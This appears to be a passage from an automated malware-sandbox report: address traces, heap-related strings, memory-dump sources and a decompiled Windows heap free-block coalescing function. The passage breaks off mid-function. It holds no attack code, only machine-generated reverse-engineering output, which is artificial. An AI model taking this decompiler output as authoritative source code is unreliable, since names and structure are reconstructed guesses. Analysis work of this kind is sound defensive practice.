                                                0x00907440
                                                0x00907443
                                                0x00907443
                                                0x00907444
                                                0x00907447
                                                0x00907447
                                                0x0090744a
                                                0x0090744a
                                                0x0090744d
                                                0x0090744f
                                                0x00907452
                                                0x00907455
                                                0x00907458
                                                0x0090745a
                                                0x00000000
                                                0x00000000
                                                0x00907460
                                                0x00907460
                                                0x00907463
                                                0x00907466
                                                0x00907468
                                                0x00939eea
                                                0x0090746e
                                                0x0090746e
                                                0x00907471
                                                0x00907474
                                                0x00907477
                                                0x00907479
                                                0x0090747b
                                                0x0090747b
                                                0x0090747b
                                                0x0090747e
                                                0x0090747e
                                                0x00907484
                                                0x00907488
                                                0x0090748d
                                                0x0090748f
                                                0x00907492
                                                0x0090767b
                                                0x0090767b
                                                0x00000000
                                                0x00907498
                                                0x0090749a
                                                0x0090749d
                                                0x009074a0
                                                0x009074a2
                                                0x00939ef3
                                                0x009074a8
                                                0x009074a8
                                                0x009074aa
                                                0x009074ad
                                                0x009074af
                                                0x009074b1
                                                0x009074b1
                                                0x009074b1
                                                0x009074b4
                                                0x009074b4
                                                0x009074bf
                                                0x009074c1
                                                0x00933d2b
                                                0x00000000
                                                0x009074c7
                                                0x009074c7
                                                0x009074ca
                                                0x009074cd
                                                0x00939d59
                                                0x00939d59
                                                0x00939d66
                                                0x00939d69
                                                0x00939d77
                                                0x00939d7b
                                                0x00939d7b
                                                0x00939d7d
                                                0x00939d95
                                                0x00939d98
                                                0x00939d9a
                                                0x00939e78
                                                0x00939e78
                                                0x00939e7e
                                                0x00939e92
                                                0x00939e99
                                                0x00939e80
                                                0x00939e83
                                                0x00939e8a
                                                0x00939e8a
                                                0x00939da0
                                                0x00939da7
                                                0x00939da7
                                                0x00939da9
                                                0x00939dd7
                                                0x00939dde
                                                0x00939dab
                                                0x00939dab
                                                0x00939dab
                                                0x00939dab
                                                0x00939da9
                                                0x00939db5
                                                0x00939db7
                                                0x00939dba
                                                0x00939dbe
                                                0x00939dc1
                                                0x0094db13
                                                0x0094db13
                                                0x00939dca
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00939d7f
                                                0x00939d7f
                                                0x00939d7f
                                                0x00939d81
                                                0x00000000
                                                0x00000000
                                                0x00939d83
                                                0x00939d86
                                                0x00939d88
                                                0x00939d89
                                                0x00939d8b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00939d8b
                                                0x00939d8d
                                                0x00939d8f
                                                0x00939ecc
                                                0x00907526
                                                0x00907526
                                                0x00907529
                                                0x0090752b
                                                0x00939ed8
                                                0x00939eda
                                                0x00939edd
                                                0x00939ee0
                                                0x00939ee2
                                                0x0090744a
                                                0x0090744d
                                                0x0090744f
                                                0x00907452
                                                0x00907455
                                                0x00907458
                                                0x0090745a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090745a
                                                0x00907531
                                                0x00907531
                                                0x00907534
                                                0x0090753a
                                                0x0090753c
                                                0x00907568
                                                0x00907568
                                                0x0090756b
                                                0x0090756d
                                                0x00907570
                                                0x00907572
                                                0x0094db31
                                                0x0094db32
                                                0x0094db33
                                                0x0094db34
                                                0x0094db35
                                                0x0094db36
                                                0x0094db38
                                                0x0094db3d
                                                0x00907578
                                                0x00907578
                                                0x0090757a
                                                0x0090757d
                                                0x0090757f
                                                0x0090757f
                                                0x00907585
                                                0x00907588
                                                0x0090758e
                                                0x00907590
                                                0x00907624
                                                0x00907628
                                                0x00907632
                                                0x00907638
                                                0x00907638
                                                0x0090763a
                                                0x0090763e
                                                0x00907641
                                                0x00907645
                                                0x00907648
                                                0x0090764e
                                                0x00907674
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00907596
                                                0x00907596
                                                0x00907599
                                                0x00907599
                                                0x0090759c
                                                0x00000000
                                                0x00000000
                                                0x0090759e
                                                0x009075a0
                                                0x009075a2
                                                0x0090768a
                                                0x00000000
                                                0x0090768a
                                                0x009075ab
                                                0x009075ab
                                                0x00000000
                                                0x009075ab
                                                0x009075ac
                                                0x009075af
                                                0x009075b2
                                                0x009075b6
                                                0x009075b9
                                                0x009075bc
                                                0x0094db45
                                                0x0094db45
                                                0x009075c2
                                                0x009075c8
                                                0x009075cb
                                                0x009075d1
                                                0x009075d8
                                                0x009075db
                                                0x009075dd
                                                0x009075dd
                                                0x009075dd
                                                0x009075dd
                                                0x009075e0
                                                0x009075e3
                                                0x009075e5
                                                0x0090760b
                                                0x0090760b
                                                0x00907614
                                                0x00907617
                                                0x00000000
                                                0x009075e7
                                                0x009075e7
                                                0x009075eb
                                                0x00939f0d
                                                0x009075f1
                                                0x009075f1
                                                0x009075f4
                                                0x009075f7
                                                0x009075f9
                                                0x009075f9
                                                0x009075f9
                                                0x009075fc
                                                0x009075fc
                                                0x00907602
                                                0x00907607
                                                0x00907609
                                                0x0090761a
                                                0x0090761a
                                                0x0090761e
                                                0x00904479
                                                0x0090447b
                                                0x0090447b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00907609
                                                0x009075e5
                                                0x00907590
                                                0x0090753e
                                                0x00907541
                                                0x00907541
                                                0x00907543
                                                0x00939f04
                                                0x00907549
                                                0x00907549
                                                0x0090754c
                                                0x0090754f
                                                0x00907551
                                                0x00907553
                                                0x00907553
                                                0x00907553
                                                0x00907556
                                                0x00907556
                                                0x00907560
                                                0x00907562
                                                0x00000000
                                                0x00000000
                                                0x0094db1a
                                                0x0094db1c
                                                0x0094db22
                                                0x0094db24
                                                0x00000000
                                                0x00000000
                                                0x0094db2a
                                                0x00000000
                                                0x00907541
                                                0x00000000
                                                0x00939d8f
                                                0x009074d7
                                                0x009074da
                                                0x00000000
                                                0x00000000
                                                0x009074e0
                                                0x009074e4
                                                0x009074e6
                                                0x009074e6
                                                0x009074e6
                                                0x009074eb
                                                0x009074ee
                                                0x009074f1
                                                0x00000000
                                                0x009074f3
                                                0x009074f3
                                                0x009074f6
                                                0x009074f6
                                                0x009074f8
                                                0x00939efb
                                                0x009074fe
                                                0x009074fe
                                                0x00907501
                                                0x00907504
                                                0x00907506
                                                0x00907508
                                                0x00907508
                                                0x00907508
                                                0x0090750b
                                                0x0090750b
                                                0x00907517
                                                0x00907519
                                                0x00000000
                                                0x00000000
                                                0x0090751f
                                                0x00907521
                                                0x00907524
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00907524
                                                0x00000000
                                                0x009074f6
                                                0x009074f1
                                                0x009074c1
                                                0x0091147c
                                                0x0091147c
                                                0x00000000
                                                0x0091147c
                                                0x0090744a
                                                0x0090743a
                                                0x0090ab33
                                                0x0090ab35
                                                0x00000000
                                                0x0090ab35
                                                0x00907427
                                                0x009073f1
                                                0x009073f7
                                                0x00000000
                                                0x00000000
                                                0x009073f7
                                                0x00000000
                                                0x00907650
                                                0x00907650
                                                0x00907661
                                                0x0090766a
                                                0x0090766e
                                                0x0094db4c
                                                0x0094db53
                                                0x0094db5f
                                                0x0094db64
                                                0x0094db66
                                                0x0094db72
                                                0x0094db75
                                                0x0094db79
                                                0x0094db9b
                                                0x0094dba0
                                                0x0094db7b
                                                0x0094db93
                                                0x0094db98
                                                0x0094dba6
                                                0x0094dbab
                                                0x0094dbb3
                                                0x0094dbb3
                                                0x0094db66
                                                0x0094db53
                                                0x00000000
                                                0x0090766e

                                                Strings
                                                • HEAP: , xrefs: 0094DAB3, 0094DB9B
                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 0094DABE
                                                • HEAP[%wZ]: , xrefs: 0094DAA6, 0094DB8E
                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 0094DBA6
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                • API String ID: 0-1657114761
                                                • Opcode ID: 4d66ee3eb1b15c95c95cdba96c46e65d0dd86d441e3c15ce7ab724a07e8daf57
                                                • Instruction ID: 9807390493e4d1d32ef985a96a46995c85d7bafe4d8bb9eab9469143323c2955
                                                • Opcode Fuzzy Hash: 4d66ee3eb1b15c95c95cdba96c46e65d0dd86d441e3c15ce7ab724a07e8daf57
                                                • Instruction Fuzzy Hash: 3B02AB71A08606CFDB24CFA8C484BBAB7F5FF44320F198559E4968B291D778F981DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090351F, Relevance: 5.1, Strings: 3, Instructions: 1392COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 87%
                                                			E0090351F(signed int __ecx, void* __edx, signed int _a4, signed int _a8, signed short* _a12, signed int _a16, signed short _a20) {
				signed int _v8;
				signed short _v12;
				signed int _v16;
				signed short _v20;
				signed short _v24;
				signed short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t594;
				signed short _t596;
				signed short* _t597;
				signed short _t612;
				signed short _t613;
				signed short _t616;
				signed short _t617;
				signed short _t622;
				signed int* _t624;
				signed short* _t629;
				unsigned int _t636;
				signed short _t640;
				signed short* _t641;
				signed short _t646;
				signed short _t647;
				signed int _t652;
				signed short _t655;
				signed short _t657;
				intOrPtr* _t660;
				signed short* _t663;
				unsigned int _t670;
				signed int _t672;
				signed short* _t673;
				signed short* _t680;
				signed short _t682;
				signed short _t685;
				signed short _t686;
				signed short _t687;
				signed char _t688;
				signed short _t691;
				signed short _t693;
				signed short _t694;
				signed short _t697;
				signed short _t698;
				signed short _t701;
				signed short* _t711;
				signed short _t718;
				signed int _t721;
				signed short* _t722;
				signed short _t731;
				signed short _t733;
				signed short _t734;
				signed short _t740;
				signed short _t742;
				signed short* _t745;
				signed short* _t746;
				unsigned int _t753;
				signed short _t757;
				signed short* _t758;
				signed short* _t765;
				signed short _t767;
				signed int _t770;
				intOrPtr _t772;
				signed short* _t789;
				signed int _t791;
				intOrPtr _t793;
				signed short _t798;
				intOrPtr _t799;
				signed short _t802;
				signed int _t804;
				signed int _t805;
				signed short _t806;
				signed short _t807;
				signed short _t808;
				signed int _t815;
				signed int _t816;
				signed short _t822;
				signed short _t824;
				signed int _t828;
				signed short _t831;
				signed int _t832;
				signed int _t833;
				signed short _t834;
				signed short _t837;
				signed short _t839;
				signed int _t842;
				signed short _t843;
				signed int _t848;
				signed int _t849;
				signed int _t851;
				signed short _t852;
				signed short _t857;
				signed short _t859;
				signed int _t860;
				signed short _t861;
				signed int _t863;
				signed int _t865;
				signed int _t866;
				signed short _t867;
				signed short _t871;
				signed short _t873;
				signed short _t874;
				signed short _t875;
				signed short _t880;
				signed int _t881;
				signed int _t883;
				signed int _t884;
				signed int _t887;
				signed short _t888;
				signed short _t889;
				signed int _t892;
				signed short _t894;
				signed short _t896;
				signed int _t900;
				signed short _t903;
				intOrPtr* _t904;
				signed int _t906;
				signed int _t909;
				signed int _t911;
				signed int _t912;
				intOrPtr _t917;
				signed int _t918;
				signed int _t922;
				void* _t924;
				signed short _t925;
				void* _t926;
				intOrPtr _t927;
				void* _t928;
				signed int _t930;
				signed int _t941;
				signed short _t942;
				signed int _t943;
				signed short _t944;
				signed short* _t947;
				signed short _t948;
				signed short* _t950;
				void* _t956;
				signed short _t958;
				signed short* _t959;
				signed short _t961;
				signed short _t963;
				signed short _t964;
				signed short _t965;
				void* _t966;
				signed short _t967;
				signed int _t968;
				signed short _t969;
				intOrPtr _t970;
				signed short* _t974;
				unsigned int _t978;
				void* _t980;
				signed int _t982;
				signed short _t985;
				signed short _t986;
				signed short _t987;
				intOrPtr _t989;
				signed short* _t990;
				signed short* _t993;
				signed int _t994;
				signed short _t995;
				signed short* _t998;
				signed short _t999;
				signed short* _t1001;
				void* _t1005;
				signed short _t1007;
				signed short* _t1010;
				signed short _t1012;
				signed short _t1014;
				signed short _t1015;
				signed short _t1016;
				signed short _t1017;
				intOrPtr _t1018;
				void* _t1019;
				signed short _t1020;
				signed int _t1022;
				signed int _t1026;
				signed short* _t1030;
				unsigned int _t1034;
				void* _t1036;
				signed short _t1038;
				signed short _t1041;
				signed short _t1042;
				signed short _t1043;
				signed short _t1044;
				signed int* _t1046;
				signed short _t1060;
				signed short _t1063;
				signed int _t1064;
				void* _t1065;
				signed int _t1072;
				signed short* _t1074;
				signed short _t1075;
				signed int _t1078;
				signed short* _t1082;
				signed int _t1083;
				void* _t1084;
				signed short* _t1086;
				signed int _t1088;
				signed int _t1093;
				signed int _t1095;
				void* _t1098;
				signed short* _t1100;
				signed int _t1101;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				void* _t1107;
				signed short* _t1108;
				signed short _t1109;
				signed short _t1111;
				signed short _t1113;
				signed short _t1115;
				signed int _t1120;
				signed int _t1122;
				signed int _t1125;
				void* _t1126;
				signed short* _t1128;
				signed int _t1131;
				signed int _t1133;

				_t924 = __edx;
				_t1064 = _a4;
				_t791 = __ecx;
				 *(_t1064 + 2) = _a8;
				 *((char*)(_t1064 + 7)) = 0;
				 *(_t1064 + 4) =  *(__ecx + 0x54) ^ _a16;
				_t793 =  *((intOrPtr*)(__edx + 0x18));
				_v12 = 0;
				if(_t793 != __edx) {
					_t594 = (_t1064 - __edx >> 0x10) + 1;
					__eflags = _t594;
					_a8 = _t594;
					if(__eflags <= 0) {
						L279:
						_push(0);
						_push(0);
						_push(_t924);
						_push(_t1064);
						_push(_t793);
						_push(3);
						E0099F840(_t791, _t793, _t924, _t1064, 0, __eflags);
						_t594 = _a8;
						goto L2;
					}
					__eflags = _t594 - 0xfe;
					if(__eflags < 0) {
						goto L2;
					}
					goto L279;
				} else {
					_t594 = 0;
					L2:
					 *(_t1064 + 6) = _t594;
					_t596 = _a20;
					 *((char*)(_t1064 + 3)) = 0;
					 *_t1064 = _t596;
					_t1082 = _t1064 + _t596 * 8;
					_v28 = _t1082;
					if((( *(_t791 + 0x4c) >> 0x00000014 &  *(_t791 + 0x52) ^ _t1082[1]) & 0x00000001) == 0) {
						do {
							__eflags =  *(_t791 + 0x4c);
							if( *(_t791 + 0x4c) != 0) {
								 *_t1082 =  *_t1082 ^  *(_t791 + 0x50);
								__eflags = _t1082[1] - (_t1082[0] ^ _t1082[1] ^  *_t1082);
								if(__eflags != 0) {
									_push(0);
									_push(_t1082);
									_push(_t791);
									E0099F8EE(_t791, _t1064, _t1082, __eflags);
								}
							}
							_t925 = _t1082[6];
							_t218 =  &(_t1082[4]); // 0x8
							_t597 = _t218;
							_t798 =  *_t597;
							_v20 = _t798;
							_t799 =  *((intOrPtr*)(_t798 + 4));
							_v24 = _t925;
							_t926 =  *_t925;
							__eflags = _t926 - _t799;
							if(__eflags != 0) {
								L282:
								_push(0);
								_push(_t926);
								_push(_t799);
								_push(_t597);
								_push(_t791);
								_push(0xc);
								E0099F840(_t791, _t799, _t926, _t1064, _t1082, __eflags);
								goto L283;
							} else {
								__eflags = _t926 - _t597;
								if(__eflags != 0) {
									goto L282;
								}
								 *((intOrPtr*)(_t791 + 0x78)) =  *((intOrPtr*)(_t791 + 0x78)) - ( *_t1082 & 0x0000ffff);
								_t685 =  *(_t791 + 0xb8);
								__eflags = _t685;
								if(_t685 == 0) {
									L168:
									_t686 = _v20;
									_t852 = _v24;
									 *_t852 = _t686;
									 *(_t686 + 4) = _t852;
									__eflags = _t1082[1] & 0x00000008;
									if(__eflags != 0) {
										_t687 = E009261FE(_t1082, __eflags);
										__eflags = _t687;
										if(_t687 != 0) {
											goto L169;
										}
										E0091EE4C(_t791, _t1064, _t791, _t1082,  *_t1082 & 0x0000ffff, 1);
										L283:
										__eflags = _v12;
										if(_v12 != 0) {
											return 0;
										}
										goto L284;
									}
									L169:
									__eflags = _a12;
									if(_a12 != 0) {
										_t688 = _t1082[1];
										__eflags = _t688 & 0x00000004;
										if((_t688 & 0x00000004) != 0) {
											_t906 = ( *_t1082 & 0x0000ffff) * 8 - 0x10;
											_a8 = _t906;
											__eflags = _t688 & 0x00000002;
											if((_t688 & 0x00000002) != 0) {
												__eflags = _t906 - 4;
												if(_t906 > 4) {
													_t441 =  &_a8;
													 *_t441 = _a8 - 4;
													__eflags =  *_t441;
												}
											}
											_t444 =  &(_t1082[8]); // 0x10
											_t770 = E00928950(_t444, _a8, 0xfeeefeee);
											_a16 = _t770;
											__eflags = _t770 - _a8;
											if(_t770 != _a8) {
												_t772 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
												__eflags =  *(_t772 + 0xc);
												if( *(_t772 + 0xc) == 0) {
													_push("HEAP: ");
													E0094373B();
												} else {
													E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
												}
												_push( &(_t1082[8]) + _a16);
												E0094373B("HEAP: Free Heap block %lx modified at %lx after it was freed\n", _t1082);
												E009A06F9(_t1082);
											}
										}
									}
									 *(_t1064 + 2) = _t1082[1];
									_t691 = _a20 + ( *_t1082 & 0x0000ffff);
									_a20 = _t691;
									__eflags = _t691 - 0xfe00;
									if(_t691 > 0xfe00) {
										E00907353(_t791, _t1064, _a20);
										goto L51;
									} else {
										 *_t1064 = _t691;
										__eflags = _a12;
										 *(_t1064 + 4 + _t691 * 8) =  *(_t791 + 0x54) ^ _t691;
										 *((char*)(_t1064 + 7)) = 0;
										if(_a12 != 0) {
											 *(_t1064 + 2) =  *(_t1064 + 2) & 0x000000f0;
											__eflags =  *(_t791 + 0x40) & 0x00000040;
											_t1106 = _t691 & 0x0000ffff;
											_a16 = _t1106;
											if(( *(_t791 + 0x40) & 0x00000040) != 0) {
												E009289F0(_t1064 + 0x10, _t1106 * 8 - 0x10, 0xfeeefeee);
												_t465 = _t1064 + 2;
												 *_t465 =  *(_t1064 + 2) | 0x00000004;
												__eflags =  *_t465;
											}
											_t693 =  *(_t791 + 0xb8);
											__eflags = _t693;
											if(_t693 != 0) {
												while(1) {
													__eflags = _t1106 -  *((intOrPtr*)(_t693 + 4));
													if(_t1106 <  *((intOrPtr*)(_t693 + 4))) {
														break;
													}
													_t857 =  *_t693;
													__eflags = _t857;
													if(_t857 == 0) {
														_t859 =  *((intOrPtr*)(_t693 + 4)) - 1;
														__eflags = _t859;
														_v8 = _t859;
														L327:
														_a12 = _t693;
														_t694 = _t693 + 0x14;
														__eflags = _t694;
														_a20 = _t694;
														while(1) {
															_t860 = _t859 -  *_a20;
															_t697 = _a12[0xc];
															_t989 =  *((intOrPtr*)(_t697 + 4));
															__eflags = _t697 - _t989;
															if(_t697 == _t989) {
																goto L371;
															}
															_t1072 =  *(_t791 + 0x4c);
															__eflags = _t1072;
															if(_t1072 == 0) {
																_t995 =  *(_t989 - 8) & 0x0000ffff;
															} else {
																_t1016 =  *(_t989 - 8);
																_t1072 =  *(_t791 + 0x4c);
																__eflags = _t1072 & _t1016;
																if((_t1072 & _t1016) != 0) {
																	_t1016 = _t1016 ^  *(_t791 + 0x50);
																	__eflags = _t1016;
																}
																_t995 = _t1016 & 0x0000ffff;
															}
															__eflags = _t1106 - (_t995 & 0x0000ffff);
															if(_t1106 - (_t995 & 0x0000ffff) <= 0) {
																_t998 =  *_t697 - 8;
																__eflags = _t1072;
																if(_t1072 == 0) {
																	_t999 =  *_t998 & 0x0000ffff;
																} else {
																	_t1015 =  *_t998;
																	_t1072 =  *(_t791 + 0x4c);
																	__eflags = _t1072 & _t1015;
																	if((_t1072 & _t1015) != 0) {
																		_t1015 = _t1015 ^  *(_t791 + 0x50);
																		__eflags = _t1015;
																	}
																	_t999 = _t1015 & 0x0000ffff;
																}
																__eflags = _a16 - (_t999 & 0x0000ffff);
																if(_a16 - (_t999 & 0x0000ffff) > 0) {
																	_t1001 = _a12;
																	__eflags =  *_t1001;
																	if( *_t1001 != 0) {
																		L357:
																		_t711 = _a12;
																		_t1120 = _t860 >> 5;
																		_t1074 =  *((intOrPtr*)(_t711 + 0x1c)) + _t1120 * 4;
																		_t1005 = ( *((intOrPtr*)(_t711 + 4)) -  *_a20 >> 5) - 1;
																		_t718 =  !((1 << (_t860 & 0x0000001f)) - 1) &  *_t1074;
																		__eflags = 1;
																		if(1 != 0) {
																			L361:
																			__eflags = _t718 & 0x0000ffff;
																			if((_t718 & 0x0000ffff) == 0) {
																				_t880 = _t718 >> 0x00000010 & 0x000000ff;
																				__eflags = _t880;
																				if(_t880 == 0) {
																					_t523 = (_t718 >> 0x18) + 0x9037f8; // 0x10008
																					_t721 = ( *_t523 & 0x000000ff) + 0x18;
																					__eflags = _t721;
																				} else {
																					_t522 = _t880 + 0x9037f8; // 0x10008
																					_t721 = ( *_t522 & 0x000000ff) + 0x10;
																				}
																			} else {
																				_t1007 = _t718 & 0x000000ff;
																				__eflags = _t1007;
																				if(_t1007 == 0) {
																					_t521 = (_t718 >> 0x00000008 & 0x000000ff) + 0x9037f8; // 0x10008
																					_t721 = ( *_t521 & 0x000000ff) + 8;
																				} else {
																					_t520 = _t1007 + 0x9037f8; // 0x10008
																					_t721 =  *_t520 & 0x000000ff;
																				}
																			}
																			_t1122 = (_t1120 << 5) + _t721;
																			_t722 = _a12;
																			__eflags =  *(_t722 + 8);
																			_t881 = _t1122 + _t1122;
																			if( *(_t722 + 8) == 0) {
																				_t881 = _t1122;
																			}
																			_t697 =  *( *((intOrPtr*)(_t722 + 0x20)) + _t881 * 4);
																			goto L371;
																		} else {
																			goto L358;
																		}
																		while(1) {
																			L358:
																			__eflags = _t1120 - _t1005;
																			if(_t1120 > _t1005) {
																				break;
																			}
																			_t1074 =  &(_t1074[2]);
																			_t718 =  *_t1074;
																			_t1120 = _t1120 + 1;
																			__eflags = _t718;
																			if(_t718 == 0) {
																				continue;
																			}
																			break;
																		}
																		__eflags = _t718;
																		if(_t718 == 0) {
																			_t531 =  &_a8;
																			 *_t531 = _a8 & 0x00000000;
																			__eflags =  *_t531;
																			L373:
																			_t698 = _a8;
																			__eflags = _t698;
																			if(_t698 != 0) {
																				goto L316;
																			}
																			_t874 =  *_a12;
																			_t1106 = _a16;
																			_a12 = _t874;
																			_t875 = _t874 + 0x14;
																			_a20 = _t875;
																			_t859 =  *_t875;
																			_v8 = _t859;
																			continue;
																		}
																		goto L361;
																	}
																	__eflags = _v8 - _t1001[2] - 1;
																	if(_v8 != _t1001[2] - 1) {
																		goto L357;
																	}
																	_t1010 = _a12;
																	__eflags =  *(_t1010 + 8);
																	if( *(_t1010 + 8) != 0) {
																		_t860 = _t860 + _t860;
																		__eflags = _t860;
																	}
																	_t883 =  *((intOrPtr*)( *((intOrPtr*)(_t1010 + 0x20)) + _t860 * 4));
																	while(1) {
																		__eflags = _t697 - _t883;
																		if(_t697 == _t883) {
																			goto L373;
																		}
																		__eflags = _t1072;
																		if(_t1072 == 0) {
																			_t1012 =  *(_t883 - 8) & 0x0000ffff;
																		} else {
																			_t1014 =  *(_t883 - 8);
																			_t1072 =  *(_t791 + 0x4c);
																			__eflags = _t1072 & _t1014;
																			if((_t1072 & _t1014) != 0) {
																				_t1014 = _t1014 ^  *(_t791 + 0x50);
																				__eflags = _t1014;
																			}
																			_t1012 = _t1014 & 0x0000ffff;
																		}
																		__eflags = _a16 - (_t1012 & 0x0000ffff);
																		if(_a16 - (_t1012 & 0x0000ffff) > 0) {
																			_t883 =  *_t883;
																			continue;
																		}
																		_a8 = _t883;
																		goto L373;
																	}
																	goto L373;
																} else {
																	_t697 =  *_t697;
																	goto L371;
																}
															}
															L371:
															_a8 = _t697;
															goto L373;
														}
													}
													_t693 = _t857;
												}
												_t859 = _t1106;
												_v8 = _t1106;
												goto L327;
											} else {
												_t698 =  *(_t791 + 0xc4);
												L316:
												_t1107 = _t791 + 0xc4;
												__eflags = _t1107 - _t698;
												if(_t1107 == _t698) {
													L378:
													_t861 =  *(_t698 + 4);
													_t990 = _a4;
													_t1065 =  *_t861;
													_t1108 =  &(_t990[4]);
													_a12 = _t1108;
													__eflags = _t1065 - _t698;
													if(_t1065 != _t698) {
														__eflags = 0;
														_push(0);
														_push(_t1065);
														_push(0);
														_push(_t698);
														_push(0);
														_push(0xc);
														E0099F840(_t791, 0, _t990, _t1065, _t1108, 0);
														_t990 = _a4;
													} else {
														 *_t1108 = _t698;
														_t1108[2] = _t861;
														 *_t861 = _t1108;
														 *(_t698 + 4) = _t1108;
													}
													 *((intOrPtr*)(_t791 + 0x78)) =  *((intOrPtr*)(_t791 + 0x78)) + ( *_t990 & 0x0000ffff);
													_t701 =  *(_t791 + 0xb8);
													__eflags = _t701;
													if(_t701 == 0) {
														L402:
														__eflags =  *(_t791 + 0x4c);
														if( *(_t791 + 0x4c) != 0) {
															_t990[1] = _t990[0] ^  *_t990 ^ _t990[1];
															 *_t990 =  *_t990 ^  *(_t791 + 0x50);
														}
														L51:
														return 1;
													} else {
														_t863 =  *_t990 & 0x0000ffff;
														while(1) {
															__eflags = _t863 -  *((intOrPtr*)(_t701 + 4));
															if(_t863 <  *((intOrPtr*)(_t701 + 4))) {
																break;
															}
															_t1109 =  *_t701;
															__eflags = _t1109;
															if(_t1109 == 0) {
																_t1111 =  *((intOrPtr*)(_t701 + 4)) - 1;
																__eflags = _t1111;
																L388:
																_t865 = _t1111 -  *((intOrPtr*)(_t701 + 0x14));
																__eflags =  *(_t701 + 8);
																_a20 = _t865;
																if( *(_t701 + 8) != 0) {
																	_t865 = _t865 + _t865;
																	__eflags = _t865;
																}
																 *((intOrPtr*)(_t701 + 0xc)) =  *((intOrPtr*)(_t701 + 0xc)) + 1;
																_t866 = _t865 << 2;
																_a8 = _t866;
																_t867 =  *(_t866 +  *((intOrPtr*)(_t701 + 0x20)));
																_a16 = _t867;
																__eflags = _t1111 -  *((intOrPtr*)(_t701 + 4)) - 1;
																if(_t1111 ==  *((intOrPtr*)(_t701 + 4)) - 1) {
																	_t563 = _t701 + 0x10;
																	 *_t563 =  *(_t701 + 0x10) + 1;
																	__eflags =  *_t563;
																}
																__eflags = _t867;
																if(_t867 == 0) {
																	L399:
																	 *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t701 + 0x20)))) = _a12;
																	_t867 = _a16;
																	goto L400;
																} else {
																	__eflags =  *(_t791 + 0x4c);
																	if( *(_t791 + 0x4c) == 0) {
																		_t1113 =  *(_t867 - 8) & 0x0000ffff;
																	} else {
																		_t1115 =  *(_t867 - 8);
																		__eflags =  *(_t791 + 0x4c) & _t1115;
																		if(( *(_t791 + 0x4c) & _t1115) != 0) {
																			_t1115 = _t1115 ^  *(_t791 + 0x50);
																			__eflags = _t1115;
																		}
																		_t1113 = _t1115 & 0x0000ffff;
																	}
																	__eflags = ( *_t990 & 0x0000ffff) - (_t1113 & 0x0000ffff);
																	if(( *_t990 & 0x0000ffff) - (_t1113 & 0x0000ffff) > 0) {
																		L400:
																		__eflags = _t867;
																		if(_t867 == 0) {
																			_t993 =  *((intOrPtr*)(_t701 + 0x1c)) + (_a20 >> 5) * 4;
																			 *_t993 =  *_t993 | 1;
																			__eflags =  *_t993;
																			_t990 = _a4;
																		}
																		goto L402;
																	} else {
																		goto L399;
																	}
																}
															}
															_t701 = _t1109;
														}
														_t1111 = _t863;
														goto L388;
													}
												}
												_t994 =  *(_t791 + 0x4c);
												while(1) {
													__eflags = _t994;
													if(_t994 == 0) {
														_t871 =  *(_t698 - 8) & 0x0000ffff;
													} else {
														_t873 =  *(_t698 - 8);
														_t994 =  *(_t791 + 0x4c);
														__eflags = _t994 & _t873;
														if((_t994 & _t873) != 0) {
															_t873 = _t873 ^  *(_t791 + 0x50);
															__eflags = _t873;
														}
														_t871 = _t873 & 0x0000ffff;
													}
													__eflags = _a16 - (_t871 & 0x0000ffff);
													if(_a16 <= (_t871 & 0x0000ffff)) {
														goto L378;
													}
													_t698 =  *_t698;
													__eflags = _t1107 - _t698;
													if(_t1107 != _t698) {
														continue;
													}
													goto L378;
												}
												goto L378;
											}
										}
										_t884 = _t691 & 0x0000ffff;
										 *(_t1064 + 2) = 0;
										_t731 =  *(_t791 + 0xb8);
										_v8 = _t884;
										__eflags = _t731;
										if(_t731 != 0) {
											while(1) {
												__eflags = _t884 -  *((intOrPtr*)(_t731 + 4));
												if(_t884 <  *((intOrPtr*)(_t731 + 4))) {
													break;
												}
												_t1017 =  *_t731;
												__eflags = _t1017;
												if(_t1017 == 0) {
													_t884 =  *((intOrPtr*)(_t731 + 4)) - 1;
													break;
												}
												_t731 = _t1017;
											}
											_a12 = _t731;
											_a20 = _t884;
											_t1064 = _t731 + 0x14;
											while(1) {
												_t733 = _a12[0xc];
												_t1018 =  *((intOrPtr*)(_t733 + 4));
												_t887 = _a20 -  *_t1064;
												_a16 = _t733;
